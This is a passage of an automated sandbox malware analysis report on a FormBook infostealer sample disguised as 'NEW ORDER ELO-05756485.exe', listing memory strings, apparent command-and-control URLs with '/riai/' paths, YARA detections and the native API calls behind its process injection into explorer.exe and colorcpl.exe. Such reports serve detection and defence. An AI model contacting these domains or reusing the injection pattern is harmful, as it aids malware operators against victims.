          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.pinupcasino-start.site/riai/www.learningfitbit.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.pinupcasino-start.siteReferer:
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.skipbinsplus.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.skipbinsplus.com/riai/
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.skipbinsplus.com/riai/www.controlservicesreport.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.skipbinsplus.comReferer:
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.stuntmemorabilia.net
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.stuntmemorabilia.net/riai/
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.stuntmemorabilia.net/riai/www.yourbesttacolife.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.stuntmemorabilia.netReferer:
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.thewellbeingsutra.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.thewellbeingsutra.com/riai/
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.thewellbeingsutra.com/riai/www.stuntmemorabilia.net
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.thewellbeingsutra.comReferer:
          Source: explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.upperish.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.upperish.com/riai/
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.upperish.com/riai/www.elevictory.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.upperish.comReferer:
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.yourbesttacolife.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.yourbesttacolife.com/riai/
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.yourbesttacolife.com/riai/www.dingolope.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.yourbesttacolife.comReferer:
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: NEW ORDER ELO-05756485.exeString found in binary or memory: https://www.gnu.org
          Source: NEW ORDER ELO-05756485.exeString found in binary or memory: https://www.gnu.org/licenses/
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.351832870.0000000000B88000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.392063770.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.353489494.00000000039D3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.392670755.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.392967604.0000000000E60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.598954001.0000000002B60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.598682434.0000000002540000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.392063770.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.392063770.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.353489494.00000000039D3000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.353489494.00000000039D3000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.392670755.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.392670755.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.392967604.0000000000E60000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.392967604.0000000000E60000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.598954001.0000000002B60000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.598954001.0000000002B60000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.598682434.0000000002540000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.598682434.0000000002540000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: NEW ORDER ELO-05756485.exe
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07380AA8 NtQueryInformationProcess,0_2_07380AA8
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07380AA2 NtQueryInformationProcess,0_2_07380AA2
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0041A060 NtClose,2_2_0041A060
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0041A110 NtAllocateVirtualMemory,2_2_0041A110
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_00419F30 NtCreateFile,2_2_00419F30
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_00419FE0 NtReadFile,2_2_00419FE0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0041A05A NtClose,2_2_0041A05A
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_00419F2B NtCreateFile,2_2_00419F2B
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_01359910
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013599A0 NtCreateSection,LdrInitializeThunk,2_2_013599A0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359860 NtQuerySystemInformation,LdrInitializeThunk,2_2_01359860
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359840 NtDelayExecution,LdrInitializeThunk,2_2_01359840
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013598F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_013598F0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359A20 NtResumeThread,LdrInitializeThunk,2_2_01359A20
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_01359A00
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359A50 NtCreateFile,LdrInitializeThunk,2_2_01359A50
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359540 NtReadFile,LdrInitializeThunk,2_2_01359540
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013595D0 NtClose,LdrInitializeThunk,2_2_013595D0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359710 NtQueryInformationToken,LdrInitializeThunk,2_2_01359710
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013597A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_013597A0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359780 NtMapViewOfSection,LdrInitializeThunk,2_2_01359780
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_01359660
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013596E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_013596E0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359950 NtQueueApcThread,2_2_01359950
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013599D0 NtCreateProcessEx,2_2_013599D0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359820 NtEnumerateKey,2_2_01359820
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0135B040 NtSuspendThread,2_2_0135B040
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013598A0 NtWriteVirtualMemory,2_2_013598A0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359B00 NtSetValueKey,2_2_01359B00
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0135A3B0 NtGetContextThread,2_2_0135A3B0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359A10 NtQuerySection,2_2_01359A10
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359A80 NtOpenDirectoryObject,2_2_01359A80
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0135AD30 NtSetContextThread,2_2_0135AD30
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359520 NtWaitForSingleObject,2_2_01359520
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359560 NtWriteFile,2_2_01359560
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013595F0 NtQueryInformationFile,2_2_013595F0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359730 NtQueryVirtualMemory,2_2_01359730
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0135A710 NtOpenProcessToken,2_2_0135A710
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0135A770 NtOpenThread,2_2_0135A770
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359770 NtSetInformationFile,2_2_01359770
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359760 NtOpenProcess,2_2_01359760
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359FE0 NtCreateMutant,2_2_01359FE0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359610 NtEnumerateValueKey,2_2_01359610
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359670 NtQueryInformationProcess,2_2_01359670
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01359650 NtQueryValueKey,2_2_01359650
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013596D0 NtCreateKey,2_2_013596D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569540 NtReadFile,LdrInitializeThunk,8_2_04569540
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045695D0 NtClose,LdrInitializeThunk,8_2_045695D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569650 NtQueryValueKey,LdrInitializeThunk,8_2_04569650
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569660 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_04569660
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045696D0 NtCreateKey,LdrInitializeThunk,8_2_045696D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045696E0 NtFreeVirtualMemory,LdrInitializeThunk,8_2_045696E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569710 NtQueryInformationToken,LdrInitializeThunk,8_2_04569710
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569FE0 NtCreateMutant,LdrInitializeThunk,8_2_04569FE0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569780 NtMapViewOfSection,LdrInitializeThunk,8_2_04569780
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569840 NtDelayExecution,LdrInitializeThunk,8_2_04569840
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569860 NtQuerySystemInformation,LdrInitializeThunk,8_2_04569860
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569910 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_04569910
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045699A0 NtCreateSection,LdrInitializeThunk,8_2_045699A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569A50 NtCreateFile,LdrInitializeThunk,8_2_04569A50
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569560 NtWriteFile,8_2_04569560
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0456AD30 NtSetContextThread,8_2_0456AD30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569520 NtWaitForSingleObject,8_2_04569520
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045695F0 NtQueryInformationFile,8_2_045695F0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569670 NtQueryInformationProcess,8_2_04569670
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569610 NtEnumerateValueKey,8_2_04569610
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0456A770 NtOpenThread,8_2_0456A770
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569770 NtSetInformationFile,8_2_04569770
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569760 NtOpenProcess,8_2_04569760
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0456A710 NtOpenProcessToken,8_2_0456A710
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569730 NtQueryVirtualMemory,8_2_04569730
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045697A0 NtUnmapViewOfSection,8_2_045697A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0456B040 NtSuspendThread,8_2_0456B040
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569820 NtEnumerateKey,8_2_04569820
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045698F0 NtReadVirtualMemory,8_2_045698F0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045698A0 NtWriteVirtualMemory,8_2_045698A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569950 NtQueueApcThread,8_2_04569950
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045699D0 NtCreateProcessEx,8_2_045699D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569A10 NtQuerySection,8_2_04569A10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569A00 NtProtectVirtualMemory,8_2_04569A00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569A20 NtResumeThread,8_2_04569A20
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569A80 NtOpenDirectoryObject,8_2_04569A80
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04569B00 NtSetValueKey,8_2_04569B00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0456A3B0 NtGetContextThread,8_2_0456A3B0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0255A060 NtClose,8_2_0255A060
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0255A110 NtAllocateVirtualMemory,8_2_0255A110
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02559F30 NtCreateFile,8_2_02559F30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02559FE0 NtReadFile,8_2_02559FE0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0255A05A NtClose,8_2_0255A05A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02559F2B NtCreateFile,8_2_02559F2B
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_028BDB4C0_2_028BDB4C
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_028BE2110_2_028BE211
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_028BC1480_2_028BC148
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_028BA7580_2_028BA758
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_073811700_2_07381170
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07387FE50_2_07387FE5
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_073808780_2_07380878
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_073868610_2_07386861
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_073845570_2_07384557
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_073825E30_2_073825E3
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_0738648B0_2_0738648B
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_073881300_2_07388130
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_073811660_2_07381166
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_073800400_2_07380040
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07389DE80_2_07389DE8
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07386B2D0_2_07386B2D
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07386B1E0_2_07386B1E
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07386B0D0_2_07386B0D
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07386AB00_2_07386AB0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07382AA00_2_07382AA0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07386AA40_2_07386AA4
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07382A900_2_07382A90
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07386AE30_2_07386AE3
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07386ACA0_2_07386ACA
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_073808680_2_07380868
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07617F120_2_07617F12
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_076126700_2_07612670
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_076185E00_2_076185E0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07614C000_2_07614C00
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_076194E00_2_076194E0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_076173480_2_07617348
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_07617BC00_2_07617BC0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_076149B00_2_076149B0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_0761AF280_2_0761AF28
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_0761AF1A0_2_0761AF1A
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_0761F7F00_2_0761F7F0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_076167C80_2_076167C8
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_0761C7860_2_0761C786
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_0761B5A20_2_0761B5A2
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_0761B5B00_2_0761B5B0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_0761BC690_2_0761BC69
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_0761A4000_2_0761A400
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 0_2_076194C60_2_076194C6
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0041E1B52_2_0041E1B5
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0041E4282_2_0041E428
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_00409E402_2_00409E40
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_00409E3C2_2_00409E3C
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013341202_2_01334120
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0131F9002_2_0131F900
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013399BF2_2_013399BF
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0133A8302_2_0133A830
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013EE8242_2_013EE824
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013D10022_2_013D1002
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013420A02_2_013420A0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E20A82_2_013E20A8
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0132B0902_2_0132B090
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E28EC2_2_013E28EC
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E2B282_2_013E2B28
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0133AB402_2_0133AB40
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0134EBB02_2_0134EBB0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013D03DA2_2_013D03DA
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013DDBD22_2_013DDBD2
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013CFA2B2_2_013CFA2B
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E22AE2_2_013E22AE
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01310D202_2_01310D20
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E2D072_2_013E2D07
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E1D552_2_013E1D55
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013425812_2_01342581
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0132D5E02_2_0132D5E0
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E25DD2_2_013E25DD
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0132841F2_2_0132841F
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013DD4662_2_013DD466
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E1FF12_2_013E1FF1
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013EDFCE2_2_013EDFCE
